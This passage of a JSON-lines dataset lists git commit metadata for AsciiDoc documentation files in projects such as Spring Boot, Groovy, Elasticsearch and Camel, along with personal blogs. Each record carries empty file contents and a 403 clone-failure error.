candrews\/spring-boot,spring-projects\/spring-boot,philwebb\/spring-boot-concourse,bjornlindstrom\/spring-boot,candrews\/spring-boot,ollie314\/spring-boot,nebhale\/spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jxblum\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,yhj630520\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,DeezCashews\/spring-boot,minmay\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,jvz\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,tsachev\/spring-boot,afroje-reshma\/spring-boot-sample,shakuzen\/spring-boot,lucassaldanha\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,scottfrederick\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,sbcoba\/spring-boot,ptahchiev\/spring-boot,habuma\/spring-boot,bijukunjummen\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,eddumelendez\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,donhuvy\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,jayarampradhan\/spring-boot,ptahchiev\/spring-boot,deki\/spring-boot,spring-projects\/spring-boot,cleverjava\/jenkins2-course-spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,philwebb\/spring-boot,philwebb\/spring-boot-concourse,joshiste\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot-concourse,jxblum\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,bijukunjummen\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,linead\/spring-boot,jxblum\/spring-boot,jbovet\/spring-boot,htynkn\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,lburgazzoli\/spring-boot,mosoft521\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,kamilszymanski\/spring-boot,deki\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,royclarkson\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,mbenson\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot-concourse,pvorb\/spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,sbcoba\/spring-boot,deki\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,spring-projects\
/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot-concourse,mosoft521\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4210dee3c476b21524022360a688123a27fd70d2","subject":"Clarify the type requirement of groovy-all dependency","message":"Clarify the type requirement of groovy-all dependency\n","repos":"paulk-asert\/groovy,apache\/incubator-groovy,russel\/groovy,russel\/groovy,shils\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,armsargis\/groovy,apache\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,shils\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,shils\/groovy,paulk-asert\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,paulk-asert\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,traneHead\/groovy-core,apache\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,russel\/incubator-groovy,traneHead\/groovy-core,shils\/groovy,apache\/groovy,apache\/groovy,jwagenleitner\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,armsargis\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,jwagenleitner\/groovy","old_file":"src\/spec\/doc\/tools-groovyc.adoc","new_file":"src\/spec\/doc\/tools-groovyc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jwagenleitner\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09dd0a2ab9f9ed4a4603cf490e75606aebc180a0","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32abb8b3191d4209b7d8c8ea39869891628da945","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3bdf592b9177d5063137be0ccdd0f2fb8d74220","subject":"Add -I to the glslc synopsis.","message":"Add -I to the glslc synopsis.\n","repos":"dneto0\/shaderc,dneto0\/shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,dneto0\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuchsia-mirror\/third_party-shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bbe331a087402b2a5e68f0d7c58856c0acb7a5e4","subject":"Add common quote controller","message":"Add common quote controller\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteController.adoc","new_file":"src\/main\/docs\/common-quoteController.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dd2a79a9560f24644d229988f2240efe6877811","subject":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","message":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2129bcb06011f2682171964bc30fdd19ffa4695","subject":"scaled images and indent code in web steps, re-structured quick reference index and documented attribute","message":"scaled images and indent code in web steps, re-structured quick reference index and documented attribute\n","repos":"janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/ref\/action\/action.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/ref\/action\/action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e0e4bbdf4a9cad591bed171e14da79b80666824","subject":"Plugin use cases document","message":"Plugin use cases document","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plugin_use_cases.adoc","new_file":"userguide\/tutorials\/plugin_use_cases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6842e43fb0a9e54c37e24872ef9dff52477f68de","subject":"Update 2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","message":"Update 
2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","new_file":"_posts\/2017-06-22-A-very-good-article-on-the-rise-of-notebooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706fffc99555a665211a67eb76b6f7adab1136a3","subject":"Update 2015-10-29-My-English-Title.adoc","message":"Update 2015-10-29-My-English-Title.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-My-English-Title.adoc","new_file":"_posts\/2015-10-29-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604c1151b279c61ef2ab6b9c8f7b271d8fc6ba4f","subject":"Update 2017-05-25-Pattern-matching.adoc","message":"Update 2017-05-25-Pattern-matching.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-25-Pattern-matching.adoc","new_file":"_posts\/2017-05-25-Pattern-matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555d803931e4d0c77588b91a7d714aab0cc5ac16","subject":"[DOC] Document Spark command line configuration","message":"[DOC] Document Spark command line configuration\n\nrelates #434\n","repos":"sarwarbhuiyan\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,holdenk\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b699237304d60e3b638dd273e21346cf6de68350","subject":"fix(promise-then): \u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u3066\u306a\u3044\u306e\u3092\u4fee\u6b63","message":"fix(promise-then): 
\u753b\u50cf\u304c\u8868\u793a\u3055\u308c\u3066\u306a\u3044\u306e\u3092\u4fee\u6b63\n","repos":"wangwei1237\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,azu\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,genie88\/promises-book,azu\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,wenber\/promises-book,cqricky\/promises-book,mzbac\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,wenber\/promises-book,liubin\/promises-book,purepennons\/promises-book,azu\/promises-book,dieface\/promises-book,oToUC\/promises-book,sunfurong\/promise,xifeiwu\/promises-book,liubin\/promises-book,liubin\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,azu\/promises-book,genie88\/promises-book,sunfurong\/promise","old_file":"Ch2_HowToWrite\/promise-then.adoc","new_file":"Ch2_HowToWrite\/promise-then.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51643c5368bb542b612789714c010f56c7571373","subject":"Update 2016-06-15-Resources-on-Documentation-Driven-Development.adoc","message":"Update 2016-06-15-Resources-on-Documentation-Driven-Development.adoc","repos":"Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io,Driven-Development\/Driven-Development.github.io","old_file":"_posts\/2016-06-15-Resources-on-Documentation-Driven-Development.adoc","new_file":"_posts\/2016-06-15-Resources-on-Documentation-Driven-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Driven-Development\/Driven-Development.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bcda458c7c0c062b6407efe1c36017ed2b3c53","subject":"Update 2019-06-16-mind-fuck.adoc","message":"Update 2019-06-16-mind-fuck.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2019-06-16-mind-fuck.adoc","new_file":"_posts\/2019-06-16-mind-fuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e0212abb0b5dc9625fd3655bc3b70520e463d05","subject":"Fixed typo in testing section (#777)","message":"Fixed typo in testing section 
(#777)\n\n","repos":"kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core","old_file":"docs\/howto\/test-in-container\/index.adoc","new_file":"docs\/howto\/test-in-container\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juangon\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7a377f5e9c8625c221c2bbd2bf7105f4cb39e65","subject":"Update 2016-08-20.adoc","message":"Update 2016-08-20.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20.adoc","new_file":"_posts\/2016-08-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb385ea2fac902aef3cca83e22134707df88fccb","subject":"Update 2017-11-13.adoc","message":"Update 2017-11-13.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-13.adoc","new_file":"_posts\/2017-11-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a94e7e06a7cbc3a1c3f8392ea46ffb78d4f49b1","subject":"GUI docu","message":"GUI docu","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/src\/4-5-GUI.adoc","new_file":"docs\/src\/4-5-GUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ebb7c7c99e684ca9c47592f17f9920b1e4d8b0a","subject":"y2b create post Beats By Dre Powerbeats Unboxing \\u0026 Overview","message":"y2b create post Beats By Dre Powerbeats Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-10-Beats-By-Dre-Powerbeats-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-01-10-Beats-By-Dre-Powerbeats-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f81b8bcaef8365d0c52bf3c87af2bccb4274bece","subject":"Updated Explorer ProgramsCache documentation","message":"Updated Explorer ProgramsCache documentation","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Programs Cache values.asciidoc","new_file":"documentation\/Programs Cache 
values.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21a60f21aca53f5798a54ed8ddf015e4d34d686","subject":"y2b create post BLACK FRIDAY DEALS! + Nexus 4 \\u0026 Wii U Giveaway!","message":"y2b create post BLACK FRIDAY DEALS! + Nexus 4 \\u0026 Wii U Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-22-BLACK-FRIDAY-DEALS--Nexus-4-u0026-Wii-U-Giveaway.adoc","new_file":"_posts\/2012-11-22-BLACK-FRIDAY-DEALS--Nexus-4-u0026-Wii-U-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a59f5f92267453bcbe6e0c004d365e32be89f55","subject":"CAMEL-12583 - Added docs","message":"CAMEL-12583 - Added docs\n","repos":"DariusX\/camel,nikhilvibhav\/camel,tdiesler\/camel,CodeSmell\/camel,tdiesler\/camel,christophd\/camel,kevinearls\/camel,nicolaferraro\/camel,tdiesler\/camel,zregvart\/camel,zregvart\/camel,CodeSmell\/camel,apache\/camel,dmvolod\/camel,objectiser\/camel,pax95\/camel,kevinearls\/camel,cunningt\/camel,nikhilvibhav\/camel,adessaigne\/camel,anoordover\/camel,objectiser\/camel,CodeSmell\/camel,apache\/camel,onders86\/camel,adessaigne\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,dmvolod\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,kevinearls\/camel,dmvolod\/camel,zregvart\/camel,onders86\/camel,Fabryprog\/camel,ullgren\/camel,dmvolod\/camel,christophd\/camel,mcollovati\/camel,anoordover\/camel,apache\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,dmvolod\/camel,nikhilvibhav\/camel,adessaigne\/camel,gnodet\/camel,objectiser\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,kevinearls\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,DariusX\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,davidkarlsen\/camel,ullgren\/camel,alvinkwekel\/camel,zregvart\/camel,gnodet\/camel,gnodet\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,dmvolod\/camel,christophd\/camel,CodeSmell\/camel,pax95\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,mcollovati\/camel,davidkarlsen\/camel,sverkera\/camel,nicolaferraro\/camel,Fabryprog\/camel,christophd\/camel,davidkarlsen\/camel,pmoerenhout\/camel,tadayosi\/camel,sverkera\/camel,jamesnetherton\/camel,sverkera\/camel,anoordover\/camel,Fabryprog\/camel,tadayosi\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,davidkarlsen\/camel,cunningt\/camel,adessaigne\/camel,sverkera\/camel,nicolaferraro\/camel,mcollovati\/camel,sverkera\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,jamesnetherton\/camel,sverkera\/camel,pax95\/camel,onders86\/camel,apache\/camel,onders86\/camel,punkhorn\/camel-upstream,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,anoordover\/camel,tadayosi\/camel,pmoerenhout\/camel,onders86\/camel,apache\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,tdiesler\/camel,jamesnetherton\/camel,adessaigne\/camel,DariusX\/camel,tdiesler\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\
/kubernetes-hpa-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-hpa-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa017703028874dbef7642670da6de99338ecd14","subject":"[DOCS] Add monitoring upgrade details (#29041)","message":"[DOCS] Add monitoring upgrade details (#29041)\n\n","repos":"rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/upgrade\/upgrade-node.asciidoc","new_file":"docs\/reference\/upgrade\/upgrade-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a957768ee5cfb9ab848f7fb267179624e54f697b","subject":"Update 2015-08-10-test.adoc","message":"Update 2015-08-10-test.adoc","repos":"enderxyz\/enderxyz.github.io,enderxyz\/enderxyz.github.io,enderxyz\/enderxyz.github.io","old_file":"_posts\/2015-08-10-test.adoc","new_file":"_posts\/2015-08-10-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/enderxyz\/enderxyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db6b9f583fe6bfb544685f09f4344783f4533a95","subject":"Update 2017-05-06-Test.adoc","message":"Update 2017-05-06-Test.adoc","repos":"carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io,carsnwd\/carsnwd.github.io","old_file":"_posts\/2017-05-06-Test.adoc","new_file":"_posts\/2017-05-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carsnwd\/carsnwd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c3e4ed040d965067d8c379b801a5fb1e69885e7c","subject":"Update 2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","message":"Update 2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","new_file":"_posts\/2016-09-13-Vzyat-xml-iz-jar-kak-resurs-chego-mozhet-byt-proshe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56f7c677b882067dfe69cdea40463d3612a35242","subject":"Update 2014-09-15-Choosing-a-Lisp.adoc","message":"Update 2014-09-15-Choosing-a-Lisp.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-15-Choosing-a-Lisp.adoc","new_file":"_posts\/2014-09-15-Choosing-a-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 